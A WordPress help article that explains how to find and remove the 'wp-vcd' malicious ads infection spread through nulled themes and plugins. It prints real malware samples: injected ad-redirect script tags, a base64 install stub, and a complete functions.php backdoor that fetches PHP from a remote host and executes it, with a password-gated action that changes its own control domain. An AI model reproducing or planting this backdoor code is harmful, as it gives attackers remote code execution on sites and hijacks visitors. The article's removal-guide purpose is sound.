How to remove Malicious Ads Code from WordPress Site ?

The main reason behind it is using nulled themes and plugins. So, try to buy the themes and plugins from the authorized websites only. Don't download from any free source and get rid of Malicious Ads Code.
A lot of WordPress users don't know even their websites contain Malicious Ads code. Sometimes, the codes can be found in simple text form, sometimes you need to decode Base64 Format into UTF-8. These codes mostly attack the users who are viewing your site through Mobile Phones or Tabs. Hackers use this technique because many wordpress users don't know what the fuck is this code.  This allows your visitors to redirect to a new site. When your visitors want to read a post or they click anywhere in your site, a new window automatically got opened. There are many securities plugin in WordPress but, they can exactly show where is the code and which one is doing this. Today, we are going to show you how to remove Malicious Ads Code From WordPress Site.

Examples of Malicious Ads Code

• Simple Text Form

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1565312&interactive=1&pushup=1"></script>
<script src="//defpush.com/ntfc.php?p=1565634" data-cfasync="false" async></script>

hxxp://go·pub2srv·com/apu·php?zoneid=1566502

<sc?ript data-cfasync="false" type="text/javascript" src="hxxp://go.pub2srv.com/apu.php?zoneid=1566502" async onerror="_gdronek()" onloaded="_zygdglq()"> < / sc?ript>

• Base64 Format

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

How to know or check whether the site is affected or not?

Mainly there are two ways to check it out. One is through Sucuri Security and another is through File Viewer, a Free Website Malware Scanner - Aw Snap. Both websites scan your websites and detect all the malicious code if there is any. Just visit their website by clicking on the above links and run a complete scan of your Website. If you have used some nulled themes and plugins, the above codes shown in examples may appear.

What to do if Sucuri Security and File Viewer, a Free Website Malware Scanner - Aw Snap detects some Malicious Ads code?

Probably, both sites show the same malicious code. Now, you have to do is log in to your site. Go to Plugins > Add New >Search " String Locator ". Install that on which is developed By Clorith. Then, you have to do is go to Tools > String Locater. A page like this will appear.

Then, copy at least some unique words from the malicious code like "go.mobisla.com" and put these words in the box right of the search string and hit the search button. It will detect the code and also shows which folder contain these codes. Go the folder through Cpanel File Manager or Click on the edit button. After that, delete the malicious ads code. Note: the Following image is just a sample to show you there is an edit button, I have searched for javascript and it is showing it in that folder.
Only this is not enough, please follow the instructions too as they might appear after sometimes.

Which WordPress Folders Get Mostly Attacked by this type of Virus?

Mostly these folders get attacked by this type of code.

1. yoursite/wp-content/themes/current_theme/functions.php
2. yoursite/wp-includes/post.php
3. yoursite/wp-includes/wp-tmp.php
4. yoursite/wp-includes/wp-vcd.php

All you have to do now is, go to your file manager through your hosting Cpanel. Then, open all of these files respectively in order like I have placed. Then you have to detect some unnecessary codes connecting one of these 4 folders and delete them as soon as possible and hit the save changes button. Please make sure to copy all the code or download that file before editing. We will show you some examples of malicious ads code in respective folders.

Malicious code in functions.php of theme

Directory: /yoursite/wp-content/themes/current_theme/functions.php
The following types of code can be found on your both of your functions.php file of my Worldpress theme and child theme. A nulled plugin had injected this code at the beginning of the functions.php file. Mostly, In functions.php, the malicious code starts after <?php  if the site is infected. Let's have a look at the code. Delete this type of code and hit the save changes button.

if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
    $div_code_name = "wp_vcd";
    switch ( $_REQUEST['action'] ) {
        case 'change_domain';
            if ( isset( $_REQUEST['newdomain'] ) ) {

                if ( ! empty( $_REQUEST['newdomain'] ) ) {
                    if ( $file = @file_get_contents( __FILE__ ) ) {
                        if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {

                            $file = preg_replace( '/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
                            @file_put_contents( __FILE__, $file );
                            print "true";
                        }


                    }
                }
            }
            break;


        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die( "" );
}


if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
    if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
        if ( $tmpcontent = @file_get_contents( "http://www.dolsh.cc/code4.php?i=" . $path ) ) {
            function theme_temp_setup( $phpCode ) {
                $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
                $handle   = fopen( $tmpfname, "w+" );
                fwrite( $handle, "<?php\n" . $phpCode );
                fclose( $handle );
                include $tmpfname;
                unlink( $tmpfname );

                return get_defined_vars();
            }

            extract( theme_temp_setup( $tmpcontent ) );
        }
    }
}

Malicious Ads code in wp-includes/post.php

Directory: /yoursite/wp-includes/post.php



Just download this post.php file and then upload it to your /yoursite/wp-includes. The main purpose of this is to replace or overwrite the previous one.

Malicious code in wp-includes/wp-tmp.php

Directory: /yoursite/wp-includes/wp-tmp.php
Open this wp-tmp.php file in edit mode. Search for some malicious code as shown in the examples below.

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1565312&interactive=1&pushup=1"></script>
<script src="//defpush.com/ntfc.php?p=1565634" data-cfasync="false" async></script>

hxxp://go·pub2srv·com/apu·php?zoneid=1566502

<sc?ript data-cfasync="false" type="text/javascript" src="hxxp://go.pub2srv.com/apu.php?zoneid=1566502" async onerror="_gdronek()" onloaded="_zygdglq()"> < / sc?ript>

Either you can delete these code or delete everything except this code "ini_set('display_errors', 0);
error_reporting(0);" and hit the save changes button. You can copy and paste this code only in your tmp.php file.

Malicious  Ads code in wp-includes/wp-vcd.php

Directory: /yoursite/wp-includes/wp-vcd.php



Open this wp-vcd.php file in edit mode. Search for some malicious code as shown in the examples below. Here you can get some malicious code in base64 format. You can easily decode it from here.

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Delete all of these codes and click save changes button.
At last, make sure to scan your site on  Sucuri Security and on File Viewer, a Free Website Malware Scanner - Aw Snap. Furthermore, if you still have some questions or problems, please contact me at info@techrusher.com,
if you find this article helpful, please write a comment.